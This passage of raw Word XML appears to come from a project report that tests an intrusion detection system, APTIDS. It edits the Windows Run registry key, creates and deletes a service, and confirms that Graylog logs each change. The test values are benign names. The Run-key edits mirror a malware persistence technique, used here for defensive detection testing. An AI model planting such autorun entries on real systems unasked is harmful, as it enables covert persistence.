          <w:p w:rsidR="00061DAF" w:rsidRDefault="00061DAF" w:rsidP="00061DAF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Modify the Registry name:</w:t>
            </w:r>
            <w:r w:rsidR="00845C37">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00845C37" w:rsidRPr="00845C37">
              <w:rPr>
                <w:i/>
              </w:rPr>
              <w:t>New Value #1</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> to be: </w:t>
            </w:r>
            <w:r w:rsidR="00845C37">
              <w:t>aaaTesting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1981" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00061DAF" w:rsidRDefault="00297A98" w:rsidP="00061DAF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Action</w:t>
            </w:r>
            <w:r w:rsidR="00061DAF">
              <w:t xml:space="preserve"> Captured</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00861E5F" w:rsidTr="00297A98">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1545" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00861E5F" w:rsidRDefault="00861E5F" w:rsidP="00061DAF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Modify</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5244" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00861E5F" w:rsidRDefault="00861E5F" w:rsidP="00061DAF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Modify the Registry name: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
              </w:rPr>
              <w:t>New Value #2</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> to be: bbbTesting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1981" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00861E5F" w:rsidRDefault="00861E5F" w:rsidP="00061DAF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Action Captured</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AD0CD2" w:rsidTr="00297A98">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1545" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00AD0CD2" w:rsidRDefault="00AD0CD2" w:rsidP="00AD0CD2">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Add</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5244" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00AD0CD2" w:rsidRDefault="00AD0CD2" w:rsidP="00AD0CD2">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Add Registry Subkey:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AD0CD2" w:rsidRDefault="00AD0CD2" w:rsidP="00AD0CD2">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>HK</w:t>
            </w:r>
            <w:r w:rsidR="00F533E7">
              <w:t>LM</w:t>
            </w:r>
            <w:r>
              <w:t>/Software/Microsoft/Widnows/Current Version/Run/</w:t>
            </w:r>
            <w:r w:rsidR="00252341">
              <w:t>New Key #1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1981" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00AD0CD2" w:rsidRDefault="00AD0CD2" w:rsidP="00AD0CD2">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Action Captured</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AD0CD2" w:rsidTr="00297A98">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1545" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00AD0CD2" w:rsidRDefault="00AD0CD2" w:rsidP="00AD0CD2">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Modify</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5244" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00AD0CD2" w:rsidRDefault="00AD0CD2" w:rsidP="00AD0CD2">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Modify Registry Subkey:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AD0CD2" w:rsidRDefault="00F533E7" w:rsidP="00AD0CD2">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>HKLM</w:t>
            </w:r>
            <w:r w:rsidR="00AD0CD2">
              <w:t>/Software/Microsoft/Widnows/Current Version/Run/APTIDS_Testing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1981" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00AD0CD2" w:rsidRDefault="00AD0CD2" w:rsidP="00AD0CD2">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Action Captured</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AD0CD2" w:rsidTr="00297A98">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1545" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00AD0CD2" w:rsidRDefault="00AD0CD2" w:rsidP="00AD0CD2">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Add</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5244" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00AD0CD2" w:rsidRDefault="00AD0CD2" w:rsidP="00AD0CD2">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Add Service name: AAATesting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1981" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00AD0CD2" w:rsidRDefault="00AD0CD2" w:rsidP="00AD0CD2">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Action Captured</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AD0CD2" w:rsidTr="00297A98">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1545" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00AD0CD2" w:rsidRDefault="00AD0CD2" w:rsidP="00AD0CD2">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Delete</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5244" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00AD0CD2" w:rsidRDefault="00AD0CD2" w:rsidP="00AD0CD2">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Delete Service name: AAATesting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1981" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00AD0CD2" w:rsidRDefault="00AD0CD2" w:rsidP="00BA52F8">
            <w:pPr>
              <w:keepNext/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Action Captured</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00BA52F8" w:rsidRPr="00BA52F8" w:rsidRDefault="00BA52F8" w:rsidP="00BA52F8">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="113" w:name="_Toc485303805"/>
      <w:r w:rsidRPr="00BA52F8">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4</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2</w:t>
      </w:r>
      <w:r w:rsidR="00A91688">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00BA52F8">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Manual tests performed and their result</w:t>
      </w:r>
      <w:bookmarkEnd w:id="113"/>
    </w:p>
    <w:p w:rsidR="00845C37" w:rsidRDefault="00845C37">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C425FC" w:rsidRDefault="00845C37" w:rsidP="00C425FC">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Firstly, w</w:t>
      </w:r>
      <w:r w:rsidR="00297A98">
        <w:t xml:space="preserve">e run Regedit.exe under Administrator authority for modifying Registry Database. First, we add </w:t>
      </w:r>
      <w:r w:rsidR="00E34E4E">
        <w:t>2 String value named “New Value #1” and “New Value #2” in “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E34E4E" w:rsidRDefault="00E34E4E" w:rsidP="00E34E4E">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21481CAF" wp14:editId="18435317">
            <wp:extent cx="5581650" cy="38430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1650" cy="3843020"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A94909" w:rsidRPr="00F21629" w:rsidRDefault="00E34E4E" w:rsidP="00F21629">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="114" w:name="_Toc485303784"/>
      <w:r w:rsidRPr="00F21629">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6</w:t>
      </w:r>
      <w:r w:rsidR="00377E30">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00F21629" w:rsidRPr="00F21629">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Adding 2 Registry Value using Regedit</w:t>
      </w:r>
      <w:bookmarkEnd w:id="114"/>
    </w:p>
    <w:p w:rsidR="008C0E09" w:rsidRDefault="008C0E09" w:rsidP="008C0E09">
      <w:r>
        <w:t>On Graylog server, we find that there is a stream notifying our activities.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C0E09" w:rsidRDefault="008C0E09" w:rsidP="008C0E09">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E82792D" wp14:editId="099328D3">
            <wp:extent cx="5581650" cy="2031365"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>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1650" cy="2031365"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C0E09" w:rsidRPr="008C0E09" w:rsidRDefault="008C0E09" w:rsidP="008C0E09">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="115" w:name="_Toc485303785"/>
      <w:r w:rsidRPr="008C0E09">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7</w:t>
      </w:r>
      <w:r w:rsidR="00377E30">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="008C0E09">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Graylog capture Event for creating and deleting service</w:t>
      </w:r>
      <w:bookmarkEnd w:id="115"/>
    </w:p>
    <w:p w:rsidR="00E56A43" w:rsidRDefault="00E56A43" w:rsidP="008C0E09">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F21629" w:rsidRDefault="00BF4EFF" w:rsidP="00F21629">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>The event information in detail</w:t>
      </w:r>
      <w:r w:rsidR="009B5282">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E56A43" w:rsidRDefault="00BF4EFF" w:rsidP="00E56A43">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D14E9B8" wp14:editId="4201E613">
            <wp:extent cx="5581650" cy="5019040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3083" name="Picture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1650" cy="5019040"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E56A43" w:rsidRDefault="00E56A43" w:rsidP="00E56A43">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="116" w:name="_Toc485303786"/>
      <w:r w:rsidRPr="00E56A43">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8</w:t>
      </w:r>
      <w:r w:rsidR="00377E30">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00E56A43">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Graylog </w:t>
      </w:r>
      <w:r w:rsidR="009B5282">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>event information in detail</w:t>
      </w:r>
      <w:bookmarkEnd w:id="116"/>
    </w:p>
    <w:p w:rsidR="00E56A43" w:rsidRDefault="00E56A43">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B32308" w:rsidRDefault="00E56A43" w:rsidP="00B32308">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The following activities is used to test whether APTIDS can notify any change that happen to </w:t>
      </w:r>
      <w:r w:rsidR="0005024F">
        <w:t xml:space="preserve">a value </w:t>
      </w:r>
      <w:r w:rsidR="00B32308">
        <w:t xml:space="preserve">name and value data. We modify the registry value named “New Value #1” to be “aaaTesting”, then we change the value </w:t>
      </w:r>
      <w:r w:rsidR="00A35B52">
        <w:t>name</w:t>
      </w:r>
      <w:r w:rsidR="00B32308">
        <w:t xml:space="preserve"> of “New Value #2” </w:t>
      </w:r>
      <w:r w:rsidR="00A35B52">
        <w:t>to “bbbTesting”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00454802" w:rsidRDefault="00A35B52" w:rsidP="00454802">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C66F8B8" wp14:editId="5C8EFFF1">
            <wp:extent cx="5581650" cy="38550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1650" cy="3855085"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B32308" w:rsidRDefault="00454802" w:rsidP="00454802">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="117" w:name="_Toc485303787"/>
      <w:r w:rsidRPr="00454802">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9</w:t>
      </w:r>
      <w:r w:rsidR="00377E30">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00454802">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Modify registry name for experimenting.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="117"/>
    </w:p>
    <w:p w:rsidR="00A35B52" w:rsidRDefault="00A35B52" w:rsidP="00A35B52">
      <w:r>
        <w:t>Events captured in Graylog server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A35B52" w:rsidRDefault="00A35B52" w:rsidP="00A35B52">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="297CD0A1" wp14:editId="3A64098C">
            <wp:extent cx="5581650" cy="1975485"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>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1650" cy="1975485"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A35B52" w:rsidRPr="0054192D" w:rsidRDefault="00A35B52" w:rsidP="0054192D">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="118" w:name="_Toc485303788"/>
      <w:r w:rsidRPr="0054192D">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10</w:t>
      </w:r>
      <w:r w:rsidR="00377E30">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="0054192D">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Graylog capture events that modify Registry Database</w:t>
      </w:r>
      <w:bookmarkEnd w:id="118"/>
    </w:p>
    <w:p w:rsidR="00A35B52" w:rsidRDefault="00A35B52" w:rsidP="00A35B52"/>
    <w:p w:rsidR="0054192D" w:rsidRDefault="0054192D" w:rsidP="00A35B52"/>
    <w:p w:rsidR="0054192D" w:rsidRDefault="0054192D" w:rsidP="00A35B52">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>The final test with regedit, we create a Subkey, then modify its name to be APTIDS_Testing.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00252341" w:rsidRDefault="00252341" w:rsidP="00252341">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52B50FAA" wp14:editId="36DC2D88">
            <wp:extent cx="5581650" cy="3846195"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>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1650" cy="3846195"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00252341" w:rsidRPr="000D1EBA" w:rsidRDefault="00252341" w:rsidP="000D1EBA">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="119" w:name="_Toc485303789"/>
      <w:r w:rsidRPr="000D1EBA">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11</w:t>
      </w:r>
      <w:r w:rsidR="00377E30">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="000D1EBA">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Adding a Registry subkey and </w:t>
      </w:r>
      <w:r w:rsidR="000D1EBA" w:rsidRPr="000D1EBA">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>modifying s</w:t>
      </w:r>
      <w:r w:rsidRPr="000D1EBA">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>ubkey name.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="119"/>
    </w:p>
    <w:p w:rsidR="00252341" w:rsidRDefault="00252341" w:rsidP="00A35B52">
      <w:r>
        <w:t>Graylog captures our events.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D1EBA" w:rsidRDefault="00252341" w:rsidP="000D1EBA">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C6E1030" wp14:editId="456FC480">
            <wp:extent cx="5581650" cy="1664335"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3077" name="Picture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1650" cy="1664335"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00252341" w:rsidRDefault="000D1EBA" w:rsidP="000D1EBA">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="120" w:name="_Toc485303790"/>
      <w:r w:rsidRPr="000D1EBA">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12</w:t>
      </w:r>
      <w:r w:rsidR="00377E30">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="000D1EBA">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Graylog capture events that modify Subkey</w:t>
      </w:r>
      <w:bookmarkEnd w:id="120"/>
    </w:p>
    <w:p w:rsidR="000D1EBA" w:rsidRDefault="000D1EBA" w:rsidP="000D1EBA"/>
    <w:p w:rsidR="000D1EBA" w:rsidRDefault="000D1EBA" w:rsidP="000D1EBA"/>
    <w:p w:rsidR="000D1EBA" w:rsidRDefault="000D1EBA" w:rsidP="000D1EBA"/>
    <w:p w:rsidR="000D1EBA" w:rsidRDefault="000D1EBA" w:rsidP="000D1EBA"/>
    <w:p w:rsidR="000D1EBA" w:rsidRDefault="000D1EBA" w:rsidP="000D1EBA"/>
    <w:p w:rsidR="000D1EBA" w:rsidRDefault="000D1EBA" w:rsidP="000D1EBA">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Finally, in the manually experiment, we create and delete a Windows Service</w:t>
      </w:r>
      <w:r w:rsidR="00B56746">
        <w:t xml:space="preserve"> named “aaaTesting”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> using the “sc” command executed in Windows Command Prom</w:t>
      </w:r>
      <w:r w:rsidR="00ED493B">
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>t.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED493B" w:rsidRDefault="00ED493B" w:rsidP="00ED493B">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73662842" wp14:editId="050E1EF7">
            <wp:extent cx="5581650" cy="3616960"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>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81650" cy="3616960"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B56746" w:rsidRDefault="00ED493B" w:rsidP="00ED493B">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="121" w:name="_Toc485303791"/>
      <w:r w:rsidRPr="00ED493B">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13</w:t>
      </w:r>
      <w:r w:rsidR="00377E30">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00ED493B">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Creating and deleting a Windows Service</w:t>
      </w:r>
      <w:bookmarkEnd w:id="121"/>
    </w:p>
    <w:p w:rsidR="002502B7" w:rsidRDefault="002502B7" w:rsidP="002502B7">
      <w:r>
        <w:t>Graylog captures the events.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002502B7" w:rsidRDefault="002502B7" w:rsidP="002502B7">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67B4BEB4" wp14:editId="25B1550D">
            <wp:extent cx="5581650" cy="1379220"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>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1650" cy="1379220"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="002502B7" w:rsidRDefault="002502B7" w:rsidP="002502B7">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="122" w:name="_Toc485303792"/>
      <w:r w:rsidRPr="002502B7">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14</w:t>
      </w:r>
      <w:r w:rsidR="00377E30">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="002502B7">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Graylog capture the events for creating and deleting Windows Services</w:t>
      </w:r>
      <w:bookmarkEnd w:id="122"/>
    </w:p>
    <w:p w:rsidR="008A2754" w:rsidRDefault="008A2754">
      <w:pPr>
